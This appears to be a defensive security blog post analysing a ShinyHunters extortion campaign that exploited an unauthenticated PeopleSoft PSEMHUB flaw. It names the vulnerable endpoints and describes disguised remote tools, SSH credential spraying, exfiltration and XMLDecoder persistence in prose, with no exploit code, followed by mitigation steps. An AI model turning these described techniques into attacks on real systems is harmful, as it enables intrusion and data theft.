How ShinyHunters Exploited Oracle PeopleSoft: A Deep Dive Into Zero-Day Logic Flaws

When a Zero-Day lands on your ERP backend

So, imagine you show up to work and find that your enterprise resource planning (ERP) platform, the software where your most sensitive internal records live, has somehow been exposed to the internet. That is pretty much what just happened. The ShinyHunters extortion crew (tracked by Mandiant as UNC6240) spent almost two weeks quietly targeting organizations by abusing a totally unpatched zero-day hole in Oracle PeopleSoft.

The issue is tracked as CVE-2026–35273. it's sitting at the top severity tier, with a CVSS score of 9.8/10. Here's the unsettling part: the attackers didn't need a proper login, no active session , and no user interaction at all to make it work. If an organization had the PeopleSoft Environment Management Hub reachable from the public internet, it was basically handing the server "keys" over.

This activity seemed to smack higher education networks really hard. Dozens of universities reportedly woke up to see alumni and student data dumped on cybercrime leak sites. It's one more reminder that, while teams are busy locking down cloud apps, older on-premises enterprise software stays a huge attractor for skilled extortion crews.

How the BREACH actually happened: The Attack Anatomy

Because of a weird operational blunder on the attacker side, we get a pretty detailed view into how the whole campaign played out. The ShinyHunters crew made a pretty classic operational security mistake , they left their own staging servers exposed to the open internet. A security researcher spotted open Python-based HTTP directories running on port 8888 and pointed it out publicly. When Mandiant stepped in, to investigate further, they discovered the crew's full attack toolkit left out in the open, like it was casually laid there for inspection.

The command history showed a very coordinated automated attack pipeline, basically this chain was pretty choreographed:

• Initial Foothold: Attackers used a zero-day to get in, specifically they gained access to the PeopleSoft server through the unauthenticated web path.
• Deployment: After that they dropped custom MeshCentral remote management tools onto the system, and they renamed them so they looked just like legitimate Microsoft Azure binaries , just to avoid setting off local security alarms.
• Lateral Movement: Then the attackers ran a specialized script called [victim]_fanout.sh. That script pulled information by scraping internal system configuration files for active hostnames, and after that it automatically sprayed a hardcoded set of common usernames and credentials over SSH , to compromise other internal servers.
• Exfiltration: Once they had access to the data, the group used the zstd utility to compress huge databases . They then quietly sent the files out using outbound SSH connections to a public mirror that hosted their extortion site, and they left behind a super obvious marker file named README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT

The Technical Vulnerability Explained

To understand why this bug is so dangerous we sort of have to look at what it targets, and how it does it. The vulnerability is inside the Updates Environment Management system, which supports the PeopleSoft Environment Management Hub, or PSEMHUB. This part of the product is meant to monitor environment data and handle software updates across multi server networks.

Since the PSEMHUB application processes incoming remote requests, it listens on particular web paths such as /PSEMHUB/hub and /PSIGW/HttpListeningConnector. The main flaw tied to CVE-2026–35273 lets an attacker send a specially crafted HTTP POST request to these unauthenticated endpoints.

The server ends up processing the malicious payload without really validating who sent it, or checking if they're logged in. That ends up triggering a server-side logic flaw , which then enables unauthenticated Remote Code Execution (RCE). In practice, it is like the attacker just instructs the server to download and execute their own code and the server sort of complies, no questions asked, and with high-level system privileges.

After that, the threat actors went a bit further, more like double down, to keep access around. They changed specific configuration XML files located under the web document root's environment metadata path (envmetadata/data/environment). This is where an internal utility called XMLDecoder was abused, so the moment an IT administrator rebooted the server, the harmful code would spin up again. They also pressured the compromised hosts to generate outbound Server Message Block (SMB) traffic over port 445, sort of as a way to snag corporate Windows hashes (NetNTLM) offline.

WHY It Matters: The Business and Reputational Fallout

When an enterprise-grade backend gets hit, the fallout is not just a short-lived IT inconvenience. Mandiant had to notify more than 100 different organizations, saying their environments were actively exposed or compromised during this sprint.

The higher education area took the hardest impact, accounting for 68% of the total target list. The University of Nottingham is a good example , one of the earlier publicly confirmed victims from this zero-day activity.

A data security platform called Have I Been Pwned later detected a leaked dataset tied to the campaign, containing about 455,000 distinct email addresses for current students and alumni. And it wasn't only a bare list of names and contacts, either. The compromised data included home addresses, phone numbers, very sensitive passport numbers and also background tracking data like ethnicity and documented disabilities. For any organization, leaking this level of personal data leads to an absolute nightmare of reputational damage, regulatory fines, and broken user trust.

The Compliance Angle : Perimeter Controls are Non Negotiable!

This situation kind of highlights why modern compliance frameworks are so incredibly strict about managing your public-facing infrastructure. You can have excellent internal security policies, but if a legacy web application endpoint is left dangling on the open web, without a strict audit trail , then your whole perimeter is basically compromised.

This incident shows exactly why frameworks like ISO/IEC 27001 put such a heavy emphasis on access control, vulnerability management, and continuous technical testing. Under ISO 27001 , organizations are expected to identify operational risks and systematically harden any system that touches corporate or customer data. Leaving a management hub like PSEMHUB wide open to the public without restrictive firewall rules is a fast track to failing an audit .

Similarly for the financial and banking sectors operating under regional frameworks like the RBI IS Audit Guidelines , maintaining absolute perimeter integrity is non-negotiable. These strict guidelines require that core solutions, ERP databases, and web-facing middleware must go through aggressive, routine security reviews. The whole point of these audits is to catch unauthenticated pathways and configuration mistakes before an extortion group can find them.

Mitigation and Defense: HOW to Secure Your Environment?

If your organization is running Oracle PeopleSoft, you really should treat this like an active emergency, not a slow "next quarter" type thing. Oracle has released patches for PeopleTools versions 8.61 and 8.62, but since these fixes sit behind a support login, your immediate defense strategy has to lean hard on mitigation plus active threat hunting.

• Step 1: Lock Down The Perimeter

The very first move is to stop outside traffic from even reaching the vulnerable piece.

For a multi-server setup, disable the Environment Management Hub service completely.

For a single-server setup, remove the PSEMHUB application entirely.

If you can't disable it, then you need to block outside web access to /PSEMHUB/* (especially /PSEMHUB/hub) and /PSIGW/HttpListeningConnector at the perimeter firewall.

Note: Mandiant is pretty clear that betting everything on Web Application Firewall (WAF) body-inspection rules is risky. Those rules can be bypassed, and then you end up thinking you're protected when you're not. The hard endpoint blocking approach is the only reliable fix. Also, restricting those paths should not break normal user sessions, so it's not a tradeoff situation.

• Step 2: Continuous Security Validation

To keep perimeter blind spots from sneaking around unnoticed later, organizations need to shift away from reactive security. Deploy continuous Web Application Security Testing so you can find concealed application logic issues and unintended open API pathways before they get weaponized.

And at the same time, run ongoing, aggressive Network Penetration Testing. It helps simulate real-world attacker flows, including the lateral SSH movement reported in this incident, which then makes it easier to correct weak internal credentials and tighten up exposed settings. Finally, because credentials and data can end up on underground markets like, instantly during a zero-day event, integrating a dedicated dark web monitoring engine such as DARKX gives security teams the kind of real-time intelligence they need to track leaked data and shut down compromised sessions before secondary attacks really get the chance to root.

Key Concepts Explained

• Zero-Day Vulnerability: A security flaw in software being actively exploited by threat actors before the developer even knows about it, or has issued a fix.
• Remote Code Execution (RCE): A high impact cyberattack where an attacker runs harmful commands on a remote host from anywhere on earth.
• Unauthenticated Endpoint: A web-access pathway on a server that does not require a user to sign in or present credentials to get in.
• Lateral Movement: A method used by cyberattackers after they have an initial foothold inside a network, in order to widen their access to other internal assets.
• Command-and-Control (C2) Server: A central server operated by cybercriminals that sends directives to malware-infected machines, and collects stolen data in return.
• Indicators of Compromise (IoCs): Digital traces or odd artifacts left in logs and files, that help security teams confirm a breach has taken place.